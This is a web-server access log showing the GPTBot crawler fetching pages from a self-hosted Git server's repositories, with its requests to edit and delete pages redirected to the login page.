git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-3_error.log?display=rendered" [Client 74.7.227.38] [Length 10926] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-3_error.log" -[17/Feb/2026:16:24:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-1_access.log?display=source" [Client 74.7.227.38] [Length 42999] [Gzip 16.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-1_access.log" -[17/Feb/2026:16:24:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-4_access.log?display=source" [Client 74.7.227.38] [Length 406947] [Gzip 15.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-4_access.log" -[17/Feb/2026:16:24:21 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcUaMinimal/OpcUaMinimal.csproj" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/OpcUaMinimal.csproj" -[17/Feb/2026:16:24:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcUaMinimal/OpcUaMinimal.csproj" -[17/Feb/2026:16:24:22 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcUaMinimal/OpcUaMinimal.csproj" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/OpcUaMinimal.csproj" -[17/Feb/2026:16:24:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcUaMinimal/OpcUaMinimal.csproj" -[17/Feb/2026:16:24:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcUaMinimal/OpcUaMinimal.csproj" [Client 74.7.227.38] [Length 9813] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/OpcUaMinimal.csproj" -[17/Feb/2026:16:24:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/branch/main/OpcUaMinimal/OpcUaMinimal.csproj" [Client 74.7.227.38] [Length 11031] [Gzip 3.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/OpcUaMinimal.csproj" -[17/Feb/2026:16:24:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcUaMinimal/OpcUaMinimal.csproj" [Client 74.7.227.38] [Length 362] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/OpcUaMinimal.csproj" -[17/Feb/2026:16:24:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcUaMinimal/OpcUaMinimal.csproj" [Client 74.7.227.38] [Length 911] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/OpcUaMinimal.csproj" -[17/Feb/2026:16:24:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-1_access.log?display=rendered" [Client 74.7.227.38] [Length 10930] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-1_access.log" -[17/Feb/2026:16:24:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-2_access.log?display=rendered" [Client 74.7.227.38] [Length 10930] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-2_access.log" -[17/Feb/2026:16:24:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-2_access.log?display=source" [Client 74.7.227.38] [Length 29727] [Gzip 11.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-2_access.log" -[17/Feb/2026:16:24:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-3_access.log?display=source" [Client 74.7.227.38] [Length 47134] [Gzip 12.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-3_access.log" -[17/Feb/2026:16:24:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-3_error.log?display=source" [Client 74.7.227.38] [Length 14019] [Gzip 4.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-3_error.log" -[17/Feb/2026:16:24:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-4_access.log?display=rendered" [Client 74.7.227.38] [Length 10930] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-4_access.log" -[17/Feb/2026:16:24:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/index.html" [Client 74.7.227.38] [Length 14620] [Gzip 4.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup" -[17/Feb/2026:16:24:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/-/projects?q=&sort=reversealphabetically&state=open" [Client 74.7.227.38] [Length 6807] [Gzip 2.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/-/projects" -[17/Feb/2026:16:24:29 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/OpcUaMinimal.csproj" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcUaMinimal/OpcUaMinimal.csproj" -[17/Feb/2026:16:24:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/OpcUaMinimal.csproj" -[17/Feb/2026:16:24:29 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcUaMinimal/OpcUaMinimal.csproj" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcUaMinimal/OpcUaMinimal.csproj" -[17/Feb/2026:16:24:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcUaMinimal/OpcUaMinimal.csproj" -[17/Feb/2026:16:24:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/progress.marks?display=rendered" [Client 74.7.227.38] [Length 11053] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:16:24:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/.Notebook/BRIN%20%EC%84%A4%EB%AA%85.md" [Client 74.7.227.38] [Length 13370] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.Notebook" -[17/Feb/2026:16:24:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 15262] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:16:24:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 11188] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:16:24:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 10306] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:16:24:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 11464] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:16:24:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 13274] [Gzip 4.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:16:24:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/index.html" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/index.html" -[17/Feb/2026:16:24:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/index.html" -[17/Feb/2026:16:24:34 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/index.html" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/index.html" -[17/Feb/2026:16:24:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/index.html" -[17/Feb/2026:16:24:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/index.html" [Client 74.7.227.38] [Length 812] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/index.html" -[17/Feb/2026:16:24:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/index.html" [Client 74.7.227.38] [Length 2884] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/index.html" -[17/Feb/2026:16:24:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 15234] [Gzip 4.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:16:24:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/.Notebook/BRIN%20%EC%84%A4%EB%AA%85.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.Notebook/BRIN%20%EC%84%A4%EB%AA%85.md" -[17/Feb/2026:16:24:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/.Notebook/BRIN%20%EC%84%A4%EB%AA%85.md" -[17/Feb/2026:16:24:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 9958] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" -[17/Feb/2026:16:24:37 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/.Notebook/BRIN%20%EC%84%A4%EB%AA%85.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.Notebook/BRIN%20%EC%84%A4%EB%AA%85.md" -[17/Feb/2026:16:24:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/.Notebook/BRIN%20%EC%84%A4%EB%AA%85.md" -[17/Feb/2026:16:24:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 33668] [Gzip 10.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:16:24:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 9935] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" -[17/Feb/2026:16:24:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 9963] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:16:24:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 11057] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:16:24:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 14252] [Gzip 8.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" -[17/Feb/2026:16:24:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 10502] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" -[17/Feb/2026:16:24:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:16:24:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 9934] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" -[17/Feb/2026:16:24:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 14226] [Gzip 8.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" -[17/Feb/2026:16:24:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/.Notebook/BRIN%20%EC%84%A4%EB%AA%85.md" [Client 74.7.227.38] [Length 3727] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.Notebook/BRIN%20%EC%84%A4%EB%AA%85.md" -[17/Feb/2026:16:24:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/.Notebook/BRIN%20%EC%84%A4%EB%AA%85.md" [Client 74.7.227.38] [Length 909] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.Notebook/BRIN%20%EC%84%A4%EB%AA%85.md" -[17/Feb/2026:16:24:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 9980] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:16:24:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 43099] [Gzip 19.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" 